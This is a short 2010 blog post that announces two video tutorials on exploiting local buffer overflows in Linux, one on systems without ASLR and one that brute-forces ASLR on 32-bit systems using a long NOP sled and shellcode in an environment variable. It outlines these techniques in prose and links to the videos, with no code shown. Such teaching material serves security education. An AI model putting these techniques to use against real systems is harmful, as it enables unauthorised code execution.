lun apr 19 23:46:37 CEST 2010
Two brand new video tutorials about buffer overflow exploitation
under a Linux box
--
My video tutorials are back, and the last two arrived are now on
SecurityTube, so I'll post them here too.
The first video tutorial illustrates how to exploit a local ap-
plication vulnerable to buffer overflow on a Linux kernel without
ASLR (so, a kernel version < 2.6.8, or >= 2.6.8 but with ASLR
disabled by /proc/sys/kernel/randomize_va_space set at 0). The
technique is quite old-fashioned, but still effective on many
systems out there, running deprecated Linux versions or adminis-
trated by silly administrators thinking ASLR is a loss of time
for the kernel. So, just check it out:
http://0x00.ath.cx/video/15
The second video tutorial illustrates how to exploit a local ap-
plication vulnerable to buffer overflow under a modern Linux ker-
nel >= 2.6.8 with ASLR on a 32 bits system, just doing a brute
force attack on the stack using a very long crafted environment
variable with our shellcode and a very long sequence of NOPs.
Then, the exploit's going to run the vulnerable application until
the ASLR assigns it a stack base address located in the NOPs se-
quence, making so the execution of our crafted code possible.
Just check it out:
http://0x00.ath.cx/video/14
--
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d? a? C++++ U++++ P++++ L+++++ E--- W+++ !w PS+++ PE-- Y++ PGP++ X++
R+ tv-- b+>+++ DI++ G++ e+++ h* r++ z**
------END GEEK CODE BLOCK------